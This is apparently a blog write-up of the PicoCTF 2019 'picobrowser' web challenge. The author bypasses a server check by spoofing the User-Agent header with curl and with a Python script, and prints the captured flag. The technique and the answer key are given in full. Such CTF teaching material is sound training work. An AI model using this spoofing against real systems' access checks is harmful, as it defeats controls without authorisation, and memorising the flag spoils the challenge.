PicoCTF Writeup – picobrowser

Information:

CTF Name: PicoCTF

CTF Challenge: picobrowser

Challenge Category: Web Exploitation

Challenge Points: 200

PicoCTF 2019.

# Challenge Description:

This website can be rendered only by picobrowser, go and catch the flag! https://jupiter.challenges.picoctf.org/problem/28921/ or http://jupiter.challenges.picoctf.org:28921

Hint: You don’t need to download a new web browser

Writeup

 
In this challenge we are given a URL. The description also states that this website can only be rendered by picobrowser.
 
I decided to open the URL anyway and see what it returned. This was the result:
 
So far so good. Let’s see what happens if I click the “Flag” button. An error appears, shown in the image below:
 
 
The error states that our browser is not picobrowser; it is instead: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36.
 
I know, from previous challenges, that this string is the value of the HTTP ‘User-Agent’ request header, which the browser fills in by default. The server is evidently deciding who gets the flag based on that header alone, and since the client controls every header it sends, I thought I could simply edit this value and make the request again.
To do so I followed this procedure:
 
1- First I opened the developer tools by pressing F12 and switched to the Network tab, as you can see in the image below:
 
 
2- Next I repeated the request by clicking the “Flag” button. The Network tab in the developer tools then recorded the communication between the browser and the server, see the image below:
 
 
3- As you can see, there are two requests named flag. The first has status code 307 (Temporary Redirect): its only job was to send the browser on to the second request, so we can ignore it. The second has status code 200 (OK) and carries the actual response, so this is the request we need to replay with a modified header. To do so I right-clicked on it and chose Copy -> Copy as cURL, as you can see in the image below:
 

4- After copying the request in cURL syntax I pasted it into a text editor and changed the ‘User-Agent’ header to picobrowser, like this:

# Replay of the /flag request copied from the Network tab; only the User-Agent line was changed
curl 'https://jupiter.challenges.picoctf.org/problem/28921/flag' \
  -H 'Connection: keep-alive' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: picobrowser' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-Mode: navigate' \
  -H 'Sec-Fetch-User: ?1' \
  -H 'Sec-Fetch-Dest: document' \
  -H 'Referer: https://jupiter.challenges.picoctf.org/problem/28921/' \
  -H 'Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7' \
  -H 'Cookie: _ga=GA1.2.96783362.1610984369; _gid=GA1.2.116443271.1611157562' \
  --compressed
 
5- Finally, I went to the Linux terminal and pasted the command above. The output was the HTML of the page:
 
 
As you can see, we have the flag! 
picoCTF{p1c0_s3cr3t_ag3nt_84f9c865}

I just want to say that there are other ways to solve this challenge; you can use Burp Suite, for example, or any tool that lets you set request headers yourself. Of the dozen headers copied from the browser, only User-Agent matters here.
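As an added example (not the challenge’s code and not the author’s script), here is the same bypass in Python using only the standard library. The server-side check is not published, so `server_allows` is a hypothetical model reconstructed from the error message the page returns; `SAMPLE_HTML` is a constructed snippet so the parsing step runs offline. `FLAG_URL` is the URL from the writeup.

```python
"""Replay the /flag request with a spoofed User-Agent (added example)."""
import re
import urllib.request
from typing import Iterable, Optional, Tuple

FLAG_URL = "https://jupiter.challenges.picoctf.org/problem/28921/flag"
FLAG_RE = re.compile(r"picoCTF\{[^}]*\}")


def server_allows(headers: Iterable[Tuple[str, str]]) -> bool:
    """Hypothetical model of the server's check (an assumption, not the real
    code): the error page only complains about the User-Agent string, so a
    plain compare on that header is the natural guess. Header names are
    case-insensitive, hence the lower() on the name."""
    for name, value in headers:
        if name.lower() == "user-agent":
            return value.strip() == "picobrowser"
    return False


def build_request(url: str, user_agent: str = "picobrowser") -> urllib.request.Request:
    """Equivalent of `curl -A picobrowser URL`. Only the User-Agent header is
    needed; the Sec-Fetch-*, Referer and Cookie headers the browser copied
    are noise. Note urllib normalises the stored name to 'User-agent'."""
    req = urllib.request.Request(url)
    req.add_header("User-Agent", user_agent)
    return req


def extract_flag(html: str) -> Optional[str]:
    """Pull the picoCTF{...} token out of the returned HTML, if present."""
    match = FLAG_RE.search(html)
    return match.group(0) if match else None


def fetch_flag(url: str = FLAG_URL, user_agent: str = "picobrowser",
               timeout: float = 10.0) -> Optional[str]:
    """Live request. urlopen follows the 307 seen in the Network tab and
    re-sends the request headers, so the spoofed User-Agent survives it."""
    with urllib.request.urlopen(build_request(url, user_agent), timeout=timeout) as resp:
        return extract_flag(resp.read().decode("utf-8", errors="replace"))


# Constructed sample of a success page, so extract_flag can be run offline.
SAMPLE_HTML = "<html><body><p>You got the flag: picoCTF{p1c0_s3cr3t_ag3nt_84f9c865}</p></body></html>"

if __name__ == "__main__":
    req = build_request(FLAG_URL)
    print("spoofed UA passes the modelled check:", server_allows(req.header_items()))
    print("flag parsed from sample page:", extract_flag(SAMPLE_HTML))
    try:
        print("live result:", fetch_flag())
    except OSError as exc:  # URLError/HTTPError are OSErrors: no network, or challenge retired
        print("live request failed:", exc)
```

The point the model makes is the one the challenge is built around: a User-Agent check is a client-side control wearing a server-side costume, because the client writes the header. The minimal curl equivalent is `curl -L -A picobrowser 'https://jupiter.challenges.picoctf.org/problem/28921/flag'`.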


Thank you very much for reading!

Cheers,

MRegra



2 Replies to “PicoCTF Writeup – picobrowser”

  1. Hello there! This is kind of off topic but I need some guidance
    from an established blog. Is it tough to set up your own blog?

    I’m not very technical but I can figure things out pretty fast.
    I’m thinking about creating my own but I’m not sure where to start.
    Do you have any points or suggestions? Thanks

    1. Hello, sure! I can write a post on this 🙂
      I will try to finish it this week.
      Thanks for the feedback, have a nice day.
